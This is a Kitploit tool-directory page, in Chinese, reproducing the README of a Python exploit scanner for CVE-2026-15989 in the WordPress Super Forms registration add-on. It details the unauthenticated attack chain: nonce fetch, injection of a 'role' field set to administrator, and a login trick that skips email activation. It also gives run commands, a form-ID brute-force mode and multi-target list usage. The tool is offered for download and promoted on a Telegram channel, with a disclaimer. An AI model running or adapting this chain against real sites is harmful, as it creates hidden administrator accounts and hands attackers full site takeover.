Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-15989 — Python PoC 扫描器,用于 CVE-2026-15989,利用 WordPress Super Forms 中的未认证角色注入漏洞创建管理员账户并验证访问权限。 | Kitploit
工具/GitHubGitHub/antid00t/cve-2026-15989
权限提升漏洞扫描器密码攻击漏洞利用脚本与自动化Web应用程序漏洞利用Web安全渗透测试红队
GitHubantid00t/cve-2026-15989

CVE-2026-15989

Python PoC 扫描器,用于 CVE-2026-15989,利用 WordPress Super Forms 中的未认证角色注入漏洞创建管理员账户并验证访问权限。

14小时20分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
                  █████╗  ███╗   ██╗ ████████╗ ██╗ ██████╗   ██████╗   ██████╗  ████████╗
                 ██╔══██╗ ████╗  ██║ ╚══██╔══╝ ██║ ██╔══██╗ ██╔═████╗ ██╔═████╗ ╚══██╔══╝
              ███████║ ██╔██╗ ██║    ██║    ██║ ██║  ██║ ██║██╔██║ ██║██╔██║    ██║
              ██╔══██║ ██║╚██╗██║    ██║    ██║ ██║  ██║ ████╔╝██║ ████╔╝██║    ██║
              ██║  ██║ ██║ ╚████║    ██║    ██║ ██████╔╝ ╚██████╔╝ ╚██████╔╝    ██║
              ╚═╝  ╚═╝ ╚═╝  ╚═══╝    ╚═╝    ╚═╝ ╚═════╝   ╚═════╝   ╚═════╝     ╚═╝

💉 Super Forms — 多环境提权扫描器

CVE-2026-15989 · 未认证管理员账户创建

                                       » E X P L O I T S «

Python 3.8+ CVSS 9.8 CRITICAL WordPress Engine Banner style Telegram

🔥 无指纹自动发现 · 验证感知载荷 · 零认证 · 诚实分类

screen02


🎯 目标

WordPress 插件Super Forms – 拖拽式表单构建器(注册与登录附加组件)
受影响版本<= 6.3.316
修复版本6.3.317
认证❌ 无需认证 — 任意已发布的注册表单即可
CVSS9.8 CRITICAL

⚡ 攻击链

👑 CVE-2026-15989 — 白名单 role 键 → 管理员账户创建
GET admin-ajax.php?action=super_create_nonce ──► _sfs_id session + sf_nonce
        │
POST admin-ajax.php  action=super_submit_form  data=<JSON>
        │
      before_email_success_msg()  (Register & Login add-on)
        │
$other_userdata = array( ..., 'role', ... )   ◄── client key whitelisted
        │
$data['role']['value']  ──►  $userdata['role']   (register_user_role overwritten)
        │
wp_insert_user()  ──►  🔥 administrator account, zero authentication

该附加组件将 $data['role']['value'] 直接复制到用户数据数组中, 未对照管理员配置的 register_user_role 进行验证, 没有允许列表,也没有任何权限检查 — 只需注入一个 "role": {"value":"administrator"} 字段即可得手。

🎟️ 登录证明 — 激活门禁绕过
POST wp-login.php   log / pwd / testcookie
        │                    + action=super_submit_form   ◄── the magic field
        │
check_user_login_status()  ──► pending/blocked gate SKIPPED
        │
GET /wp-admin/users.php
        │
200 = administrator proven  ·  403 = subscriber (patched build)

该附加组件仅在 POST action 不是 super_submit_form 时才强制执行其 邮件激活 / 审核门禁 — 因此注册用户的同一个表单 action 也解锁了 登录该用户的能力,甚至在任何邮件验证之前。

🧨 FULL 模式 — 两阶段表单 ID 爆破(无需指纹识别)
discovery empty (REST · sitemap · links · ?page_id probe)
        │
PHASE 1 — form-ID sweep 1..50, minimal payload, OWN SESSION PER ID
        │                       (shared sessions would invalidate each nonce)
        │
'required fields' reject ──► PHASE 2 — REST markup fetch ──► full payload retry
        │
every accepted candidate ──► login proof per id
        │
contact form? ──► UNVERIFIED (never a false positive)
registration? ──► 👑 verified administrator

非注册表单也会返回 error:false,因此每个被接受的 ID 在凭据通过 真实登录验证之前都只是一个候选。

🚀 快速开始

# zero dependencies — pure Python 3 stdlib (rich is optional, for the console)
python3 cve-2026-15989_poc.py --list labs.txt --output results.txt

# tuned concurrency / timeout
python3 cve-2026-15989_poc.py --list labs.txt --threads 20 --timeout 15 -o results.txt

# FULL MODE: discovery + role injection + login proof + form-ID brute (1..50)
python3 cve-2026-15989_poc.py --list labs.txt --full --output results.txt

labs.txt — 每行一个基础 URL:

http://localhost
http://192.168.56.101/lab-wp
https://10.0.0.5:8443/lab        # self-signed TLS is handled automatically
# comments and blank lines are ignored

🛠️ 选项

选项描述
--list FILE目标文件 — 每行一个 URL(必填)
--output, -o FILE命中列表 — 仅写入 VULNERABLE 目标,实时写入(无 ANSI 转义)
--threads N并发目标工作线程数(默认 10)
--timeout N每请求套接字超时秒数(默认 10)
--full运行完整攻击链 — 增加表单 ID 爆破回退(在存在漏洞的目标上将会创建账户)

🧾 结果状态

状态含义
VULNERABLE账户已创建且已验证 wp-admin 管理员访问权限(200)
NOT-VULNERABLE登录成功但管理页面返回 403 — 角色被忽略 → 已修复版本
UNVERIFIED提交被接受但登录被拒绝(账户被锁定/待审核或非注册表单)— 绝不作为静默误报上报
BLOCKED提交被拒绝(reCAPTCHA、CSRF、必填字段、蜜罐……)
ERROR目标不可达 / DNS 失败 — 附带确切原因上报

✨ 功能特性

  • 🔍 无指纹自动发现 — REST 渲染内容(wp-json + ?rest_route= 回退)→ sitemap 索引 → 40+ 多语言注册路径(/register、/kayit-ol、/registrieren……)→ ?page_id=N 探测;适用于任何主题、页面构建器和固定链接风格
  • 🧬 验证感知载荷合成 — 每个渲染字段都按浏览器的方式自动填充:自有默认值、textarea 内容、下拉框/复选框/单选框选项、data-validation 类型(email、number、date、time、phone、IBAN、color、URL)
  • 🎟️ 自动化 CSRF — nopriv super_create_nonce 绑定到 _sfs_id 会话;爆破尝试各自拥有独立会话,因此 nonce 之间永不互相失效
  • 👑 诚实分类 — 仅在证明 wp-admin 访问权限时才标记 VULNERABLE;已修复版本通过 403 探测区分;锁定账户显示为 UNVERIFIED
  • 🥷 激活门禁绕过 — 登录证明携带 action=super_submit_form,跳过附加组件的邮件验证 / 审核门禁
  • 🧨 FULL 模式 — 两阶段表单 ID 爆破,每个 ID 均进行登录证明(联系表单绝不会误报)
  • 🛡️ URL 加固 — 主题模板链接({{ data.url }})、控制字符和 IDN/土耳其语 slug 主机名自动清理
  • 📁 干净的命中列表 — --output 仅记录已确认的目标,实时追加,始终为纯文本(便于 grep/解析)
  • 📊 Rich 控制台 — antid00t 风格 ANSI Shadow 横幅、实时计分板、汇总表;无 rich 时优雅降级为纯文本
  • 🐍 零依赖 — 纯 Python 3 标准库(rich 为可选装饰)

📋 环境要求

  • 目标:Super Forms <= 6.3.316,且注册与登录附加组件已激活,并至少有一个 已发布的表单(STANDARD)— FULL 模式完全不需要可发现的表单
  • 攻击方:Python 3.8+ — 无需 pip install

📡 加入我的频道

✈ https://t.me/jellyproject

新漏洞利用、PoC 和安全研究发布。


⚠️ 免责声明

本工具仅供教育和研究目的提供。它演示了一个公开记录的漏洞 (CVE-2026-15989),以便研究人员和管理员验证自己的实验环境。

  • 请仅在您拥有或获得明确书面许可测试的系统上使用本软件。
  • 未经授权对第三方系统使用属于违法行为。
  • 本软件按**"原样"提供,不附带任何形式的保证。作者对任何误用、 损害或法律后果不承担任何责任**。

使用本工具即表示您对自己的行为承担全部责任。


横幅:ANTID00T · ANSI Shadow 字体

下载工具